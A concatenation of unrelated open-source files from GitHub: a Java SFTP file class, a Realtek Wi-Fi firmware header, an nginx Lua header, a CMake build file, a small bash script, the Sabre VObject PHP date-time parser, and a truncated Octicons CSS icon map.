            if(connHandler!=null)
                connHandler.releaseLock();
        }
    }

    @Override
    public InputStream getInputStream(long offset) throws IOException {
        // Retrieve a ConnectionHandler and lock it
        final SFTPConnectionHandler connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true);
        try {
            // Makes sure the connection is started, if not starts it
            connHandler.checkConnection();

            InputStream in = new SFTPInputStream(connHandler.channelSftp.get(absPath), connHandler);
            in.skip(offset);
            return in;
        }
        catch(IOException e) {
            // Release the lock on the ConnectionHandler if the InputStream could not be created
            connHandler.releaseLock();

            // Re-throw IOException
            throw e;
        }
        catch (SftpException e) {
            // Release the lock and propagate the failure instead of returning null
            // (this was previously a TODO auto-generated catch block)
            connHandler.releaseLock();
            throw new IOException("Failed to open an input stream for " + absPath, e);
        }
    }

    @Override
    public String getCanonicalPath() {
        if(isSymlink()) {
            // Check if there is a previous value that hasn't expired yet
            if(canonicalPath!=null && (System.currentTimeMillis()-canonicalPathFetchedTime<attributeCachingPeriod))
                return canonicalPath;

            SFTPConnectionHandler connHandler = null;
            try {
                // Retrieve a ConnectionHandler and lock it
                connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(connHandlerFactory, fileURL, true);
                // Makes sure the connection is started, if not starts it
                connHandler.checkConnection();

                // readlink returns the raw symlink target, which can either be an absolute path or a
                // relative path. If the path is relative, prepend the absolute path of the symlink's parent folder.
                String symlinkTargetPath = connHandler.channelSftp.readlink(fileURL.getPath());
                if(!symlinkTargetPath.startsWith("/")) {
                    String parentPath = fileURL.getParent().getPath();
                    if(!parentPath.endsWith("/"))
                        parentPath += "/";
                    symlinkTargetPath = parentPath + symlinkTargetPath;
                }

                FileURL canonicalURL = (FileURL)fileURL.clone();
                canonicalURL.setPath(symlinkTargetPath);

                // Cache the value and return it until it expires
                canonicalPath = canonicalURL.toString(false);
                canonicalPathFetchedTime = System.currentTimeMillis();
                return canonicalPath;
            }
            catch(IOException e) {
                // Simply continue and return the absolute path
            }
            catch (SftpException e) {
                // Simply continue and return the absolute path
                // (this was previously a TODO auto-generated catch block)
            }
            finally {
                // Release the lock on the ConnectionHandler
                if(connHandler!=null)
                    connHandler.releaseLock();
            }
        }

        // If this file is not a symlink, or the symlink target path could not be retrieved, return the absolute path
        return getAbsolutePath();
    }


    ///////////////////
    // Inner classes //
    ///////////////////

    /**
     * SFTPFileAttributes provides getters and setters for SFTP file attributes. By extending
     * <code>SyncedFileAttributes</code>, this class caches attributes for a certain amount of time
     * ({@link SFTPFile#attributeCachingPeriod}) after which a fresh value is retrieved from the server.
     */
    static class SFTPFileAttributes extends SyncedFileAttributes {

        /** The URL pointing to the file whose attributes are cached by this class */
        private FileURL url;

        /** True if the file is a symlink */
        private boolean isSymlink;

        // this constructor is called by the SFTPFile public constructor
        private SFTPFileAttributes(FileURL url) throws AuthException {
            super(attributeCachingPeriod, false);       // no initial update

            this.url = url;
            setPermissions(FilePermissions.EMPTY_FILE_PERMISSIONS);

            fetchAttributes();      // throws AuthException if no or bad credentials
            updateExpirationDate(); // declare the attributes as 'fresh'
        }

        // this constructor is called by #ls()
        private SFTPFileAttributes(FileURL url, SftpATTRS attrs) {
            super(attributeCachingPeriod, false);       // no initial update

            this.url = url;
            setPermissions(FilePermissions.EMPTY_FILE_PERMISSIONS);
            setAttributes(attrs);
            setExists(true);

            // Some information about this value:
            // FileAttribute#isLink() returns a proper value only for FileAttributes instances that were returned by
            // SftpFile#ls(). FileAttributes that are returned by SftpSubsystemClient#getAttributes(String) always
            // return false for isLink().
            // That means the value of isSymlink is not updated by fetchAttributes(), because if it was, isSymlink
            // would be false after the first attributes update.
            this.isSymlink = attrs.isLink();

            updateExpirationDate(); // declare the attributes as 'fresh'
        }

        private void fetchAttributes() throws AuthException {
            SFTPConnectionHandler connHandler = null;
            try {
                // Retrieve a ConnectionHandler and lock it
                connHandler = (SFTPConnectionHandler)ConnectionPool.getConnectionHandler(SFTPFile.connHandlerFactory, url, true);
                // Makes sure the connection is started, if not starts it
                connHandler.checkConnection();

                // Retrieve the file attributes from the server. This will throw an SftpException if the file
                // doesn't exist on the server.
                // Note for symlinks: the FileAttributes returned by SftpSubsystemClient#getAttributes(String)
                // returns the values of the symlink's target, not the symlink file itself. In other words: the size,
                // date, isDirectory, isLink values are those of the linked file. This is not a problem, except for
                // isLink because it makes it impossible to detect changes in the isLink state. Changes should not
                // happen very often, but still.
                setAttributes(connHandler.channelSftp.lstat(url.getPath()));
                setExists(true);
            }
            catch(SftpException e) {
                // File doesn't exist on the server
                if (e.id == ChannelSftp.SSH_FX_NO_SUCH_FILE)
                    setExists(false);
                else
                    LOGGER.error("failed to get attributes of " + url.getPath(), e);
            }
            catch(IOException e) {
                // Rethrow AuthException
                if (e instanceof AuthException)
                    throw (AuthException)e;
                else
                    LOGGER.error("failed to get attributes of " + url.getPath(), e);
            }
            finally {
                // Release the lock on the ConnectionHandler
                if(connHandler!=null)
                    connHandler.releaseLock();
            }
        }

        /**
         * Sets the file attributes using the values contained in the specified JSch SftpATTRS instance.
         *
         * @param attrs JSch SftpATTRS instance that contains the values to use
         */
        private void setAttributes(SftpATTRS attrs) {
            setDirectory(attrs.isDir());
            setDate((long) attrs.getMTime() * 1000);
            setSize(attrs.getSize());
            setPermissions(new SimpleFilePermissions(
                    attrs.getPermissions() & PermissionBits.FULL_PERMISSION_INT
            ));
            setOwner(String.valueOf(attrs.getUId()));
            setGroup(String.valueOf(attrs.getGId()));
            setSymlink(attrs.isLink());
        }

        /**
         * Increments the size attribute's value by the given number of bytes.
         *
         * @param increment number of bytes to add to the current size attribute's value
         */
        private void addToSize(long increment) {
            setSize(getSize()+increment);
        }

        /**
         * Returns <code>true</code> if the file is a symlink.
         *
         * @return <code>true</code> if the file is a symlink
         */
        private boolean isSymlink() {
            checkForExpiration(false);

            return isSymlink;
        }

        /**
         * Sets whether the file is a symlink.
         *
         * @param isSymlink <code>true</code> if the file is a symlink
         */
        private void setSymlink(boolean isSymlink) {
            this.isSymlink = isSymlink;
        }


        ////////////////////////////////////////////
        // SyncedFileAttributes implementation //
        ////////////////////////////////////////////

        @Override
        public void updateAttributes() {
            try {
                fetchAttributes();
            }
            catch(Exception e) {        // AuthException
                LOGGER.info("Failed to refresh attributes", e);
            }
        }
    }

    /**
     * SFTPRandomAccessInputStream extends RandomAccessInputStream to provide random read access to an SFTPFile.
     */
    private class SFTPRandomAccessInputStream extends RandomAccessInputStream {

        private InputStream in;
        private long offset;

        private SFTPRandomAccessInputStream() throws IOException {
            this.in = getInputStream();
        }

        @Override
        public int read(byte b[], int off, int len) throws IOException {
            int nbRead = in.read(b, off, len);

            if(nbRead!=-1)
                offset += nbRead;

            return nbRead;
        }

        @Override
        public int read() throws IOException {
            int read = in.read();

            if(read!=-1)
                offset += 1;

            return read;
        }

        public long getOffset() throws IOException {
            return offset;
        }

        public long getLength() throws IOException {
            return getSize();
        }

        public void seek(long offset) throws IOException {
            try {
                in.close();
            }
            catch(IOException e) {
                // Ignore errors when closing the previous stream; a new one is opened below
            }

            in = getInputStream(offset);
            this.offset = offset;
        }

        @Override
        public void close() throws IOException {
            in.close();
        }
    }

    private class SFTPInputStream extends FilterInputStream {

        private SFTPConnectionHandler connHandler;

        protected SFTPInputStream(InputStream in, SFTPConnectionHandler connHandler) {
            super(in);
            this.connHandler = connHandler;
        }

        @Override
        public void close() throws IOException {
            super.close();
            connHandler.releaseLock();
        }
    }

    private class SFTPOutputStream extends FilterOutputStream {

        private SFTPConnectionHandler connHandler;

        protected SFTPOutputStream(OutputStream out, SFTPConnectionHandler connHandler) {
            super(out);
            this.connHandler = connHandler;
        }

        @Override
        public void close() throws IOException {
            super.close();
            connHandler.releaseLock();
        }
    }
}
{ "pile_set_name": "Github" }
/****************************************************************************** * * Copyright(c) 2009-2012 Realtek Corporation. * * This program is free software; you can redistribute it and/or modify it * under the terms of version 2 of the GNU General Public License as * published by the Free Software Foundation. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., * 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA * * The full GNU General Public License is included in this distribution in the * file called LICENSE. * * Contact Information: * wlanfae <[email protected]> * Realtek Corporation, No. 2, Innovation Road II, Hsinchu Science Park, * Hsinchu 300, Taiwan. * Larry Finger <[email protected]> * *****************************************************************************/ #ifndef __RTL92C__FW__H__ #define __RTL92C__FW__H__ #define FW_8192C_SIZE 0x3000 #define FW_8192C_START_ADDRESS 0x1000 #define FW_8192C_END_ADDRESS 0x3FFF #define FW_8192C_PAGE_SIZE 4096 #define FW_8192C_POLLING_DELAY 5 #define IS_FW_HEADER_EXIST(_pfwhdr) \ ((_pfwhdr->signature&0xFFFF) == 0x2300 ||\ (_pfwhdr->signature&0xFFFF) == 0x2301 ||\ (_pfwhdr->signature&0xFFFF) == 0x2302) #define pagenum_128(_len) (u32)(((_len)>>7) + ((_len)&0x7F ? 1 : 0)) #define SET_H2CCMD_PWRMODE_PARM_MODE(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_PWRMODE_PARM_SMART_PS(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val) #define SET_H2CCMD_PWRMODE_PARM_BCN_PASS_TIME(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val) #define SET_H2CCMD_JOINBSSRPT_PARM_OPMODE(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_PROBE_RSP(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE(__ph2ccmd, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_PSPOLL(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+1, 0, 8, __val) #define SET_H2CCMD_RSVDPAGE_LOC_NULL_DATA(__ph2ccmd, __val) \ SET_BITS_TO_LE_1BYTE((__ph2ccmd)+2, 0, 8, __val) void rtl8723e_fill_h2c_cmd(struct ieee80211_hw *hw, u8 element_id, u32 cmd_len, u8 *p_cmdbuffer); void rtl8723e_set_fw_pwrmode_cmd(struct ieee80211_hw *hw, u8 mode); void rtl8723e_set_fw_rsvdpagepkt(struct ieee80211_hw *hw, bool b_dl_finished); void rtl8723e_set_fw_joinbss_report_cmd(struct ieee80211_hw *hw, u8 mstatus); void rtl8723e_set_p2p_ps_offload_cmd(struct ieee80211_hw *hw, u8 p2p_ps_state); #endif
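/*
 * Illustrative use of the helpers above (a sketch only; hw, element_id, mode,
 * smart_ps and bcn_pass_time are placeholder variables, not values defined in
 * this header):
 *
 *     u8 h2c_parm[3] = {0};
 *     SET_H2CCMD_PWRMODE_PARM_MODE(h2c_parm, mode);
 *     SET_H2CCMD_PWRMODE_PARM_SMART_PS(h2c_parm, smart_ps);
 *     SET_H2CCMD_PWRMODE_PARM_BCN_PASS_TIME(h2c_parm, bcn_pass_time);
 *     rtl8723e_fill_h2c_cmd(hw, element_id, sizeof(h2c_parm), h2c_parm);
 */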
{ "pile_set_name": "Github" }
/* * Copyright (C) Xiaozhe Wang (chaoslawful) * Copyright (C) Yichun Zhang (agentzh) */ #ifndef _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ #define _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ #include "ngx_http_lua_common.h" ngx_int_t ngx_http_lua_access_handler(ngx_http_request_t *r); ngx_int_t ngx_http_lua_access_handler_inline(ngx_http_request_t *r); ngx_int_t ngx_http_lua_access_handler_file(ngx_http_request_t *r); #endif /* _NGX_HTTP_LUA_ACCESSBY_H_INCLUDED_ */ /* vi:set ft=c ts=4 sw=4 et fdm=marker: */
{ "pile_set_name": "Github" }
project(mri_segstats) include_directories(${FS_INCLUDE_DIRS}) add_executable(mri_segstats mri_segstats.cpp) add_help(mri_segstats mri_segstats.help.xml) target_link_libraries(mri_segstats utils) add_test_script(NAME mri_segstats_test SCRIPT test.sh DEPENDS mri_segstats) install(TARGETS mri_segstats DESTINATION bin)
{ "pile_set_name": "Github" }
#!/usr/bin/env bash # print the beagrep dir . ~/system-config/etc/bash.d/cd_beagrep cd_beagrep cd_beagrep pwd
{ "pile_set_name": "Github" }
<?php namespace Sabre\VObject; use DateInterval; use DateTimeImmutable; use DateTimeZone; /** * DateTimeParser. * * This class is responsible for parsing the several different date and time * formats iCalendar and vCards have. * * @copyright Copyright (C) fruux GmbH (https://fruux.com/) * @author Evert Pot (http://evertpot.com/) * @license http://sabre.io/license/ Modified BSD License */ class DateTimeParser { /** * Parses an iCalendar (rfc5545) formatted datetime and returns a * DateTimeImmutable object. * * Specifying a reference timezone is optional. It will only be used * if the non-UTC format is used. The argument is used as a reference, the * returned DateTimeImmutable object will still be in the UTC timezone. * * @param string $dt * @param DateTimeZone $tz * * @return DateTimeImmutable */ public static function parseDateTime($dt, DateTimeZone $tz = null) { // Format is YYYYMMDD + "T" + hhmmss $result = preg_match('/^([0-9]{4})([0-1][0-9])([0-3][0-9])T([0-2][0-9])([0-5][0-9])([0-5][0-9])([Z]?)$/', $dt, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar datetime value is incorrect: '.$dt); } if ('Z' === $matches[7] || is_null($tz)) { $tz = new DateTimeZone('UTC'); } try { $date = new DateTimeImmutable($matches[1].'-'.$matches[2].'-'.$matches[3].' '.$matches[4].':'.$matches[5].':'.$matches[6], $tz); } catch (\Exception $e) { throw new InvalidDataException('The supplied iCalendar datetime value is incorrect: '.$dt); } return $date; } /** * Parses an iCalendar (rfc5545) formatted date and returns a DateTimeImmutable object. * * @param string $date * @param DateTimeZone $tz * * @return DateTimeImmutable */ public static function parseDate($date, DateTimeZone $tz = null) { // Format is YYYYMMDD $result = preg_match('/^([0-9]{4})([0-1][0-9])([0-3][0-9])$/', $date, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar date value is incorrect: '.$date); } if (is_null($tz)) { $tz = new DateTimeZone('UTC'); } try { $date = new DateTimeImmutable($matches[1].'-'.$matches[2].'-'.$matches[3], $tz); } catch (\Exception $e) { throw new InvalidDataException('The supplied iCalendar date value is incorrect: '.$date); } return $date; } /** * Parses an iCalendar (RFC5545) formatted duration value. * * This method will either return a DateTimeInterval object, or a string * suitable for strtotime or DateTime::modify. * * @param string $duration * @param bool $asString * * @return DateInterval|string */ public static function parseDuration($duration, $asString = false) { $result = preg_match('/^(?<plusminus>\+|-)?P((?<week>\d+)W)?((?<day>\d+)D)?(T((?<hour>\d+)H)?((?<minute>\d+)M)?((?<second>\d+)S)?)?$/', $duration, $matches); if (!$result) { throw new InvalidDataException('The supplied iCalendar duration value is incorrect: '.$duration); } if (!$asString) { $invert = false; if ('-' === $matches['plusminus']) { $invert = true; } $parts = [ 'week', 'day', 'hour', 'minute', 'second', ]; foreach ($parts as $part) { $matches[$part] = isset($matches[$part]) && $matches[$part] ? (int) $matches[$part] : 0; } // We need to re-construct the $duration string, because weeks and // days are not supported by DateInterval in the same string. 
$duration = 'P'; $days = $matches['day']; if ($matches['week']) { $days += $matches['week'] * 7; } if ($days) { $duration .= $days.'D'; } if ($matches['minute'] || $matches['second'] || $matches['hour']) { $duration .= 'T'; if ($matches['hour']) { $duration .= $matches['hour'].'H'; } if ($matches['minute']) { $duration .= $matches['minute'].'M'; } if ($matches['second']) { $duration .= $matches['second'].'S'; } } if ('P' === $duration) { $duration = 'PT0S'; } $iv = new DateInterval($duration); if ($invert) { $iv->invert = true; } return $iv; } $parts = [ 'week', 'day', 'hour', 'minute', 'second', ]; $newDur = ''; foreach ($parts as $part) { if (isset($matches[$part]) && $matches[$part]) { $newDur .= ' '.$matches[$part].' '.$part.'s'; } } $newDur = ('-' === $matches['plusminus'] ? '-' : '+').trim($newDur); if ('+' === $newDur) { $newDur = '+0 seconds'; } return $newDur; } /** * Parses either a Date or DateTime, or Duration value. * * @param string $date * @param DateTimeZone|string $referenceTz * * @return DateTimeImmutable|DateInterval */ public static function parse($date, $referenceTz = null) { if ('P' === $date[0] || ('-' === $date[0] && 'P' === $date[1])) { return self::parseDuration($date); } elseif (8 === strlen($date)) { return self::parseDate($date, $referenceTz); } else { return self::parseDateTime($date, $referenceTz); } } /** * This method parses a vCard date and or time value. * * This can be used for the DATE, DATE-TIME, TIMESTAMP and * DATE-AND-OR-TIME value. * * This method returns an array, not a DateTime value. * * The elements in the array are in the following order: * year, month, date, hour, minute, second, timezone * * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the year, etc. * * Timezone is either returned as 'Z' or as '+0800' * * For any non-specified values null is returned. * * List of date formats that are supported: * YYYY * YYYY-MM * YYYYMMDD * --MMDD * ---DD * * YYYY-MM-DD * --MM-DD * ---DD * * List of supported time formats: * * HH * HHMM * HHMMSS * -MMSS * --SS * * HH * HH:MM * HH:MM:SS * -MM:SS * --SS * * A full basic-format date-time string looks like : * 20130603T133901 * * A full extended-format date-time string looks like : * 2013-06-03T13:39:01 * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +1100. * * @param string $date * * @return array */ public static function parseVCardDateTime($date) { $regex = '/^ (?: # date part (?: (?: (?<year> [0-9]{4}) (?: -)?| --) (?<month> [0-9]{2})? |---) (?<date> [0-9]{2})? )? (?:T # time part (?<hour> [0-9]{2} | -) (?<minute> [0-9]{2} | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{4}) )? )? $/x'; if (!preg_match($regex, $date, $matches)) { // Attempting to parse the extended format. $regex = '/^ (?: # date part (?: (?<year> [0-9]{4}) - | -- ) (?<month> [0-9]{2}) - (?<date> [0-9]{2}) )? (?:T # time part (?: (?<hour> [0-9]{2}) : | -) (?: (?<minute> [0-9]{2}) : | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{2}:[0-9]{2}) )? )? 
$/x'; if (!preg_match($regex, $date, $matches)) { throw new InvalidDataException('Invalid vCard date-time string: '.$date); } } $parts = [ 'year', 'month', 'date', 'hour', 'minute', 'second', 'timezone', ]; $result = []; foreach ($parts as $part) { if (empty($matches[$part])) { $result[$part] = null; } elseif ('-' === $matches[$part] || '--' === $matches[$part]) { $result[$part] = null; } else { $result[$part] = $matches[$part]; } } return $result; } /** * This method parses a vCard TIME value. * * This method returns an array, not a DateTime value. * * The elements in the array are in the following order: * hour, minute, second, timezone * * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the hour etc. * * Timezone is either returned as 'Z' or as '+08:00' * * For any non-specified values null is returned. * * List of supported time formats: * * HH * HHMM * HHMMSS * -MMSS * --SS * * HH * HH:MM * HH:MM:SS * -MM:SS * --SS * * A full basic-format time string looks like : * 133901 * * A full extended-format time string looks like : * 13:39:01 * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +11:00. * * @param string $date * * @return array */ public static function parseVCardTime($date) { $regex = '/^ (?<hour> [0-9]{2} | -) (?<minute> [0-9]{2} | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{4}) )? $/x'; if (!preg_match($regex, $date, $matches)) { // Attempting to parse the extended format. $regex = '/^ (?: (?<hour> [0-9]{2}) : | -) (?: (?<minute> [0-9]{2}) : | -)? (?<second> [0-9]{2})? (?: \.[0-9]{3})? # milliseconds (?P<timezone> # timezone offset Z | (?: \+|-)(?: [0-9]{2}:[0-9]{2}) )? $/x'; if (!preg_match($regex, $date, $matches)) { throw new InvalidDataException('Invalid vCard time string: '.$date); } } $parts = [ 'hour', 'minute', 'second', 'timezone', ]; $result = []; foreach ($parts as $part) { if (empty($matches[$part])) { $result[$part] = null; } elseif ('-' === $matches[$part]) { $result[$part] = null; } else { $result[$part] = $matches[$part]; } } return $result; } /** * This method parses a vCard date and or time value. * * This can be used for the DATE, DATE-TIME and * DATE-AND-OR-TIME value. * * This method returns an array, not a DateTime value. * The elements in the array are in the following order: * year, month, date, hour, minute, second, timezone * Almost any part of the string may be omitted. It's for example legal to * just specify seconds, leave out the year, etc. * * Timezone is either returned as 'Z' or as '+0800' * * For any non-specified values null is returned. * * List of date formats that are supported: * 20150128 * 2015-01 * --01 * --0128 * ---28 * * List of supported time formats: * 13 * 1353 * 135301 * -53 * -5301 * --01 (unreachable, see the tests) * --01Z * --01+1234 * * List of supported date-time formats: * 20150128T13 * --0128T13 * ---28T13 * ---28T1353 * ---28T135301 * ---28T13Z * ---28T13+1234 * * See the regular expressions for all the possible patterns. * * Times may be postfixed by a timezone offset. This can be either 'Z' for * UTC, or a string like -0500 or +1100. * * @param string $date * * @return array */ public static function parseVCardDateAndOrTime($date) { // \d{8}|\d{4}-\d\d|--\d\d(\d\d)?|---\d\d $valueDate = '/^(?J)(?:'. '(?<year>\d{4})(?<month>\d\d)(?<date>\d\d)'. '|(?<year>\d{4})-(?<month>\d\d)'. '|--(?<month>\d\d)(?<date>\d\d)?'. '|---(?<date>\d\d)'. 
')$/'; // (\d\d(\d\d(\d\d)?)?|-\d\d(\d\d)?|--\d\d)(Z|[+\-]\d\d(\d\d)?)? $valueTime = '/^(?J)(?:'. '((?<hour>\d\d)((?<minute>\d\d)(?<second>\d\d)?)?'. '|-(?<minute>\d\d)(?<second>\d\d)?'. '|--(?<second>\d\d))'. '(?<timezone>(Z|[+\-]\d\d(\d\d)?))?'. ')$/'; // (\d{8}|--\d{4}|---\d\d)T\d\d(\d\d(\d\d)?)?(Z|[+\-]\d\d(\d\d?)? $valueDateTime = '/^(?:'. '((?<year0>\d{4})(?<month0>\d\d)(?<date0>\d\d)'. '|--(?<month1>\d\d)(?<date1>\d\d)'. '|---(?<date2>\d\d))'. 'T'. '(?<hour>\d\d)((?<minute>\d\d)(?<second>\d\d)?)?'. '(?<timezone>(Z|[+\-]\d\d(\d\d?)))?'. ')$/'; // date-and-or-time is date | date-time | time // in this strict order. if (0 === preg_match($valueDate, $date, $matches) && 0 === preg_match($valueDateTime, $date, $matches) && 0 === preg_match($valueTime, $date, $matches)) { throw new InvalidDataException('Invalid vCard date-time string: '.$date); } $parts = [ 'year' => null, 'month' => null, 'date' => null, 'hour' => null, 'minute' => null, 'second' => null, 'timezone' => null, ]; // The $valueDateTime expression has a bug with (?J) so we simulate it. $parts['date0'] = &$parts['date']; $parts['date1'] = &$parts['date']; $parts['date2'] = &$parts['date']; $parts['month0'] = &$parts['month']; $parts['month1'] = &$parts['month']; $parts['year0'] = &$parts['year']; foreach ($parts as $part => &$value) { if (!empty($matches[$part])) { $value = $matches[$part]; } } unset($parts['date0']); unset($parts['date1']); unset($parts['date2']); unset($parts['month0']); unset($parts['month1']); unset($parts['year0']); return $parts; } }
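// Illustrative usage of the parsers above (a sketch only; the input strings
// below are arbitrary examples, not values taken from this library):
//
//   DateTimeParser::parseDateTime('20130603T133901Z'); // DateTimeImmutable in UTC
//   DateTimeParser::parseDuration('PT5M');             // DateInterval of 5 minutes
//   DateTimeParser::parseDuration('PT5M', true);       // the string '+5 minutes'
//   DateTimeParser::parseVCardDateTime('--0412T1430'); // partial date/time as an array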
{ "pile_set_name": "Github" }
/* Octicons */ .icon.alert:before { content: '\f02d'} /*  */ .icon.alignment.align:before { content: '\f08a'} /*  */ .icon.alignment.aligned.to:before { content: '\f08e'} /*  */ .icon.alignment.unalign:before { content: '\f08b'} /*  */ .icon.arrow.down:before { content: '\f03f'} /*  */ .icon.arrow.left:before { content: '\f040'} /*  */ .icon.arrow.right:before { content: '\f03e'} /*  */ .icon.arrow.small.down:before { content: '\f0a0'} /*  */ .icon.arrow.small.left:before { content: '\f0a1'} /*  */ .icon.arrow.small.right:before { content: '\f071'} /*  */ .icon.arrow.small.up:before { content: '\f09f'} /*  */ .icon.arrow.up:before { content: '\f03d'} /*  */ .icon.beer:before { content: '\f069'} /*  */ .icon.book:before { content: '\f007'} /*  */ .icon.bookmark:before { content: '\f07b'} /*  */ .icon.briefcase:before { content: '\f0d3'} /*  */ .icon.broadcast:before { content: '\f048'} /*  */ .icon.browser:before { content: '\f0c5'} /*  */ .icon.bug:before { content: '\f091'} /*  */ .icon.calendar:before { content: '\f068'} /*  */ .icon.check:before { content: '\f03a'} /*  */ .icon.checklist:before { content: '\f076'} /*  */ .icon.chevron.down:before { content: '\f0a3'} /*  */ .icon.chevron.left:before { content: '\f0a4'} /*  */ .icon.chevron.right:before { content: '\f078'} /*  */ .icon.chevron.up:before { content: '\f0a2'} /*  */ .icon.circle.slash:before { content: '\f084'} /*  */ .icon.circuit.board:before { content: '\f0d6'} /*  */ .icon.clippy:before { content: '\f035'} /*  */ .icon.clock:before { content: '\f046'} /*  */ .icon.cloud.download:before { content: '\f00b'} /*  */ .icon.cloud.upload:before { content: '\f00c'} /*  */ .icon.code:before { content: '\f05f'} /*  */ .icon.color.mode:before { content: '\f065'} /*  */ .icon.comment.add:before, .icon.comment:before { content: '\f02b'} /*  */ .icon.comment.discussion:before { content: '\f04f'} /*  */ .icon.credit.card:before { content: '\f045'} /*  */ .icon.dash:before { content: '\f0ca'} /*  */ .icon.dashboard:before { content: '\f07d'} /*  */ .icon.database:before { content: '\f096'} /*  */ .icon.device.camera:before { content: '\f056'} /*  */ .icon.device.camera.video:before { content: '\f057'} /*  */ .icon.device.desktop:before { content: '\f27c'} /*  */ .icon.device.mobile:before { content: '\f038'} /*  */ .icon.diff:before { content: '\f04d'} /*  */ .icon.diff.added:before { content: '\f06b'} /*  */ .icon.diff.ignored:before { content: '\f099'} /*  */ .icon.diff.modified:before { content: '\f06d'} /*  */ .icon.diff.removed:before { content: '\f06c'} /*  */ .icon.diff.renamed:before { content: '\f06e'} /*  */ .icon.ellipsis:before { content: '\f09a'} /*  */ .icon.eye.unwatch:before, .icon.eye.watch:before, .icon.eye:before { content: '\f04e'} /*  */ .icon.file.binary:before { content: '\f094'} /*  */ .icon.file.code:before { content: '\f010'} /*  */ .icon.file.directory:before { content: '\f016'} /*  */ .icon.file.media:before { content: '\f012'} /*  */ .icon.file.pdf:before { content: '\f014'} /*  */ .icon.file.submodule:before { content: '\f017'} /*  */ .icon.file.symlink.directory:before { content: '\f0b1'} /*  */ .icon.file.symlink.file:before { content: '\f0b0'} /*  */ .icon.file.text:before { content: '\f011'} /*  */ .icon.file.zip:before { content: '\f013'} /*  */ .icon.flame:before { content: '\f0d2'} /*  */ .icon.fold:before { content: '\f0cc'} /*  */ .icon.gear:before { content: '\f02f'} /*  */ .icon.gift:before { content: '\f042'} /*  */ 
.icon.gist:before { content: '\f00e'} /*  */ .icon.gist.secret:before { content: '\f08c'} /*  */ .icon.git.branch.create:before, .icon.git.branch.delete:before, .icon.git.branch:before { content: '\f020'} /*  */ .icon.git.commit:before { content: '\f01f'} /*  */ .icon.git.compare:before { content: '\f0ac'} /*  */ .icon.git.merge:before { content: '\f023'} /*  */ .icon.git.pull.request.abandoned:before, .icon.git.pull.request:before { content: '\f009'} /*  */ .icon.globe:before { content: '\f0b6'} /*  */ .icon.graph:before { content: '\f043'} /*  */ .icon.heart:before { content: '\2665'} /* ♥ */ .icon.history:before { content: '\f07e'} /*  */ .icon.home:before { content: '\f08d'} /*  */ .icon.horizontal.rule:before { content: '\f070'} /*  */ .icon.hourglass:before { content: '\f09e'} /*  */ .icon.hubot:before { content: '\f09d'} /*  */ .icon.inbox:before { content: '\f0cf'} /*  */ .icon.info:before { content: '\f059'} /*  */ .icon.issue.closed:before { content: '\f028'} /*  */ .icon.issue.opened:before { content: '\f026'} /*  */ .icon.issue.reopened:before { content: '\f027'} /*  */ .icon.jersey:before { content: '\f019'} /*  */ .icon.jump.down:before { content: '\f072'} /*  */ .icon.jump.left:before { content: '\f0a5'} /*  */ .icon.jump.right:before { content: '\f0a6'} /*  */ .icon.jump.up:before { content: '\f073'} /*  */ .icon.key:before { content: '\f049'} /*  */ .icon.keyboard:before { content: '\f00d'} /*  */ .icon.law:before { content: '\f0d8'} /*  */ .icon.light.bulb:before { content: '\f000'} /*  */ .icon.linkify:before { content: '\f05c'} /*  */ .icon.linkify.external:before { content: '\f07f'} /*  */ .icon.list.ordered:before { content: '\f062'} /*  */ .icon.list.unordered:before { content: '\f061'} /*  */ .icon.location:before { content: '\f060'} /*  */ .icon.gist.private:before, .icon.mirror.private:before, .icon.git.fork.private:before, .icon.lock:before { content: '\f06a'} /*  */ .icon.logo.github:before { content: '\f092'} /*  */ .icon.mail:before { content: '\f03b'} /*  */ .icon.mail.read:before { content: '\f03c'} /*  */ .icon.mail.reply:before { content: '\f051'} /*  */ .icon.mark.github:before { content: '\f00a'} /*  */ .icon.markdown:before { content: '\f0c9'} /*  */ .icon.megaphone:before { content: '\f077'} /*  */ .icon.mention:before { content: '\f0be'} /*  */ .icon.microscope:before { content: '\f089'} /*  */ .icon.milestone:before { content: '\f075'} /*  */ .icon.mirror.public:before, .icon.mirror:before { content: '\f024'} /*  */ .icon.mortar.board:before { content: '\f0d7'} /*  */ .icon.move.down:before { content: '\f0a8'} /*  */ .icon.move.left:before { content: '\f074'} /*  */ .icon.move.right:before { content: '\f0a9'} /*  */ .icon.move.up:before { content: '\f0a7'} /*  */ .icon.mute:before { content: '\f080'} /*  */ .icon.no.newline:before { content: '\f09c'} /*  */ .icon.octoface:before { content: '\f008'} /*  */ .icon.organization:before { content: '\f037'} /*  